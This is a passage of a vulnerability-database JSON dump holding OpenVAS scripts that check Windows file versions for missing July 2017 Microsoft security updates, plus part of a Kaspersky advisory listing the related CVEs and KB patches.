script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to force the browser to send data that would otherwise be restricted to a\n destination web site of their choice, to obtain information to further\n compromise the user's system, to run arbitrary code in kernel mode, to run\n processes in an elevated context, to run arbitrary code in the context of\n another user, to could read arbitrary files via an XML external entity (XXE)\n declaration, to bypass Extended Protection for Authentication, take control\n of the affected system, retrieve the base address of the kernel driver from\n a compromised process, execute malicious code on a vulnerable system, cause\n a denial of service, obtain information to further compromise the system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7 for 32-bit/x64 Systems Service Pack 1\n\n - Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4025337\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"win32k.sys\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.1.7601.23848\"))\n{\n report = 'File checked: ' + sysPath + \"\\win32k.sys\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 6.1.7601.23848\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:19:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8587", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8565", "CVE-2017-8561", "CVE-2017-8467", "CVE-2017-8562", "CVE-2017-8495", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8463", "CVE-2017-8590"], "description": "This host is missing a critical security\n update according to Microsoft KB4025343", "modified": "2020-06-04T00:00:00", "published": "2017-07-12T00:00:00", "id": "OPENVAS:1361412562310811464", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811464", "type": "openvas", "title": "Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4025343)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4025343)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811464\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0170\", \"CVE-2017-8463\", \"CVE-2017-8467\", \"CVE-2017-8486\",\n \"CVE-2017-8495\", \"CVE-2017-8556\", \"CVE-2017-8557\", \"CVE-2017-8561\",\n \"CVE-2017-8562\", \"CVE-2017-8563\", \"CVE-2017-8564\", \"CVE-2017-8565\",\n \"CVE-2017-8573\", \"CVE-2017-8577\", \"CVE-2017-8578\", \"CVE-2017-8580\",\n \"CVE-2017-8581\", \"CVE-2017-8582\", \"CVE-2017-8587\", \"CVE-2017-8588\",\n \"CVE-2017-8589\", \"CVE-2017-8590\", \"CVE-2017-8592\");\n script_bugtraq_id(99389, 99409, 99414, 99424, 99439, 99398, 99426, 99397, 99402,\n 99428, 99394, 99431, 99416, 99419, 99421, 99423, 99429, 99413,\n 99400, 99425, 99427, 99396);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-07-12 09:58:32 +0530 (Wed, 12 Jul 2017)\");\n script_name(\"Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4025343)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4025343\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - When Win32k fails to properly handle objects in memory.\n\n - When the Microsoft Graphics Component fails to properly handle\n objects in memory.\n\n - When Windows Explorer improperly handles executable files and shares during\n rename operations.\n\n - When Windows improperly handles calls to Advanced Local Procedure Call (ALPC).\n\n - The way that the Windows Kernel handles objects in memory.\n\n - The way that Microsoft WordPad parses specially crafted files.\n\n - when Windows Explorer attempts to open a non-existent file.\n\n - when Windows improperly handles objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n who successfully exploited the vulnerability could gain the same user rights as\n the current user, could run arbitrary code, processes with elevated privileges.\n Also could take control of the affected system and cause a denial of service.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2012.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4025343\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2012:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"win32k.sys\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.2.9200.22210\"))\n{\n report = 'File checked: ' + sysPath + \"\\win32k.sys\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 6.2.9200.22210\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:23:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8587", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8565", "CVE-2017-8467", "CVE-2017-8495", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8602", "CVE-2017-8618", "CVE-2017-8463", "CVE-2017-8590"], "description": "This host is missing a critical security\n update according to Microsoft KB4025341", "modified": "2020-06-04T00:00:00", "published": "2017-07-12T00:00:00", "id": "OPENVAS:1361412562310811516", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811516", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4025341)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4025341)\n#\n# Authors:\n# Rinu <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811516\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8602\", \"CVE-2017-0170\", \"CVE-2017-8463\", \"CVE-2017-8467\",\n \"CVE-2017-8486\", \"CVE-2017-8495\", \"CVE-2017-8618\", \"CVE-2017-8556\",\n \"CVE-2017-8557\", \"CVE-2017-8563\", \"CVE-2017-8564\", \"CVE-2017-8565\",\n \"CVE-2017-8573\", \"CVE-2017-8577\", \"CVE-2017-8578\", \"CVE-2017-8580\",\n \"CVE-2017-8581\", \"CVE-2017-8582\", \"CVE-2017-8587\", \"CVE-2017-8588\",\n \"CVE-2017-8589\", \"CVE-2017-8590\", \"CVE-2017-8592\");\n script_bugtraq_id(99390, 99389, 99409, 99414, 99424, 99399, 99439, 99398, 99402,\n 99428, 99394, 99431, 99416, 99419, 99421, 99423, 99429, 99413,\n 99400, 99425, 99427, 99396);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-07-12 09:43:16 +0530 (Wed, 12 Jul 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4025341)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4025341\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists when,\n\n - Microsoft Windows fails to properly handle objects in memory.\n\n - The way JavaScript engines render when handling objects in memory in\n Microsoft browsers.\n\n - Windows Explorer improperly handles executable files and shares during\n rename operations.\n\n - An affected Microsoft browser does not properly parse HTTP content.\n\n - Windows improperly handles calls to Advanced Local Procedure Call (ALPC).\n\n - Microsoft Windows when Kerberos falls back to NT LAN Manager (NTLM)\n Authentication Protocol as the default authentication protocol.\n\n - Windows Kernel improperly handles objects in memory.\n\n - The Windows kernel fails to properly initialize a memory address.\n\n - PSObject wraps a CIM Instance.\n\n - Microsoft Graphics Component fails to properly handle objects in memory.\n\n - VBScript engine, when rendered in Internet Explorer, improperly handles\n objects in memory.\n\n - Microsoft Browsers improperly handle redirect requests.\n\n - Microsoft Windows when Kerberos fails to prevent tampering with the SNAME\n field during ticket exchange.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Windows System Information Console when it improperly parses XML input\n containing a reference to an external entity.\n\n - Windows Performance Monitor Console when it improperly parses XML input\n containing a reference to an external entity.\n\n - Microsoft WordPad parses specially crafted files.\n\n - Windows Search improperly handles objects in memory.\n\n - Windows Explorer attempts to open a non-existent file.\n\n - Windows improperly handles objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n an attacker to obtain information to further compromise the user's system,\n gain the same user rights as the current user, run arbitrary\n code in the context of another user, trick a user by redirecting the user\n to a specially crafted website, run processes in an elevated cretrieve the\n base address of the kernel driver from a compromised process, embed an\n ActiveX control marked 'safe for initialization' in an application or\n Microsoft Office document that hosts the Internet Explorer rendering engine,\n force the browser to send data that would otherwise be restricted to a\n destination web site of their choice, bypass Extended Protection for\n Authentication, read arbitrary files via an XML external entity (XXE)\n declaration and cause a denial of service.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7 for 32-bit/x64 Systems Service Pack 1\n\n - Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4025341\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"clfs.sys\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.1.7601.23841\"))\n{\n report = 'File checked: ' + sysPath + \"\\clfs.sys\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 6.1.7601.23841\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:22:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8578", "CVE-2017-8486", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8556", "CVE-2017-8467", "CVE-2017-8581", "CVE-2017-8577"], "description": "This host is missing an important security\n update according to Microsoft KB4025877", "modified": "2020-06-04T00:00:00", "published": "2017-07-12T00:00:00", "id": "OPENVAS:1361412562310811224", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811224", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4025877)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4025877)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811224\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8467\", \"CVE-2017-8486\", \"CVE-2017-8556\", \"CVE-2017-8573\",\n \"CVE-2017-8577\", \"CVE-2017-8578\", \"CVE-2017-8580\", \"CVE-2017-8581\");\n script_bugtraq_id(99409, 99414, 99439, 99431, 99416, 99419, 99421, 99423);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-07-12 09:05:15 +0530 (Wed, 12 Jul 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4025877)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4025877\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Microsoft Windows fails to properly handle objects in memory.\n\n - Microsoft Windows Graphics Component fails to properly handle objects in\n memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to obtain access to sensitive information to further compromise the user's\n system, run arbitrary code in kernel mode and run processes in an elevated\n context.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4025877\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"win32k.sys\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.0.6002.19816\"))\n{\n Vulnerable_range = \"Less than 6.0.6002.19816\";\n VULN = TRUE ;\n}\n\nelse if(version_in_range(version:fileVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.24135\"))\n{\n Vulnerable_range = \"6.0.6002.23000 - 6.0.6002.24135\";\n VULN = TRUE ;\n}\n\nif(VULN)\n{\n report = 'File checked: ' + sysPath + \"\\win32k.sys\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2020-09-02T11:47:04", "bulletinFamily": "info", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8608", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8587", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8606", "CVE-2017-8607", "CVE-2017-8565", "CVE-2017-8467", "CVE-2017-8495", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8618", "CVE-2017-8463", "CVE-2017-8590"], "description": "### *Detect date*:\n07/11/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Support Update). Malicious users can exploit these vulnerabilities to obtain sensitive information, execute arbitrary code, gain privileges, bypass security restrictions, cause denial of service.\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:\n\n### *Affected products*:\nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 for 32-bit Systems \nInternet Explorer 9 \nWindows 10 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 8.1 for 32-bit systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 8.1 for x64-based systems \nWindows Server 2012 \nInternet Explorer 11 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2016 \nWindows RT 8.1 \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows 10 Version 1703 for x64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows 10 Version 1511 for 32-bit Systems \nMicrosoft Edge (EdgeHTML-based) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1511 for x64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nInternet Explorer 10 \nWindows 10 Version 1703 for 32-bit Systems \nWindows Server 2012 R2\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-8486](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8486>) \n[CVE-2017-8608](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8608>) \n[CVE-2017-8467](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8467>) \n[CVE-2017-8606](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8606>) \n[CVE-2017-8463](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8463>) \n[CVE-2017-8563](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8563>) \n[CVE-2017-8590](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8590>) \n[CVE-2017-8564](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8564>) \n[CVE-2017-8565](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8565>) \n[CVE-2017-8607](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8607>) \n[CVE-2017-8618](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8618>) \n[CVE-2017-8592](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8592>) \n[CVE-2017-8495](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8495>) \n[CVE-2017-8557](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8557>) \n[CVE-2017-8556](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8556>) \n[CVE-2017-8573](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8573>) \n[CVE-2017-8577](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8577>) \n[CVE-2017-8578](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8578>) \n[CVE-2017-0170](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0170>) \n[CVE-2017-8588](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8588>) \n[CVE-2017-8589](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8589>) \n[CVE-2017-8587](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8587>) \n[CVE-2017-8580](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8580>) \n[CVE-2017-8581](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8581>) \n[CVE-2017-8582](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8582>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2017-0170](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0170>)0.0Unknown \n[CVE-2017-8463](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8463>)0.0Unknown \n[CVE-2017-8467](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8467>)0.0Unknown \n[CVE-2017-8486](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8486>)0.0Unknown \n[CVE-2017-8495](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8495>)0.0Unknown \n[CVE-2017-8556](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8556>)0.0Unknown \n[CVE-2017-8557](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8557>)0.0Unknown \n[CVE-2017-8563](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8563>)0.0Unknown \n[CVE-2017-8564](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8564>)0.0Unknown \n[CVE-2017-8565](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8565>)0.0Unknown \n[CVE-2017-8573](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8573>)0.0Unknown \n[CVE-2017-8577](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8577>)0.0Unknown \n[CVE-2017-8578](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8578>)0.0Unknown \n[CVE-2017-8580](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8580>)0.0Unknown \n[CVE-2017-8581](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8581>)0.0Unknown \n[CVE-2017-8582](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8582>)0.0Unknown \n[CVE-2017-8587](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8587>)0.0Unknown \n[CVE-2017-8588](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8588>)0.0Unknown \n[CVE-2017-8589](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8589>)0.0Unknown \n[CVE-2017-8590](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8590>)0.0Unknown \n[CVE-2017-8592](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8592>)0.0Unknown \n[CVE-2017-8606](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8606>)0.0Unknown \n[CVE-2017-8607](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8607>)0.0Unknown \n[CVE-2017-8608](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8608>)0.0Unknown \n[CVE-2017-8618](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8618>)0.0Unknown\n\n### *KB list*:\n[4022746](<http://support.microsoft.com/kb/4022746>) \n[4022748](<http://support.microsoft.com/kb/4022748>) \n[4022914](<http://support.microsoft.com/kb/4022914>) \n[4025337](<http://support.microsoft.com/kb/4025337>) \n[4025341](<http://support.microsoft.com/kb/4025341>) \n[4025397](<http://support.microsoft.com/kb/4025397>) \n[4025398](<http://support.microsoft.com/kb/4025398>) \n[4025409](<http://support.microsoft.com/kb/4025409>) \n[4025497](<http://support.microsoft.com/kb/4025497>) \n[4025674](<http://support.microsoft.com/kb/4025674>) \n[4025872](<http://support.microsoft.com/kb/4025872>) \n[4025877](<http://support.microsoft.com/kb/4025877>) \n[4026059](<http://support.microsoft.com/kb/4026059>) \n[4026061](<http://support.microsoft.com/kb/4026061>) \n[4032955](<http://support.microsoft.com/kb/4032955>) \n[4025240](<http://support.microsoft.com/kb/4025240>) \n[4025252](<http://support.microsoft.com/kb/4025252>)\n\n### *Microsoft official advisories*:", "edition": 1, "modified": "2020-07-22T00:00:00", "published": "2017-07-11T00:00:00", "id": "KLA11900", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11900", "title": "\r KLA11900Multiple vulnerabilities in Microsoft Products (ESU) ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T11:50:19", "bulletinFamily": "info", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8566", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8587", "CVE-2017-8574", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8565", "CVE-2017-8561", "CVE-2017-8467", "CVE-2017-8562", "CVE-2017-8495", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8584", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8463", "CVE-2017-8590"], "description": "### *Detect date*:\n07/11/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to obtain sensitive information, execute 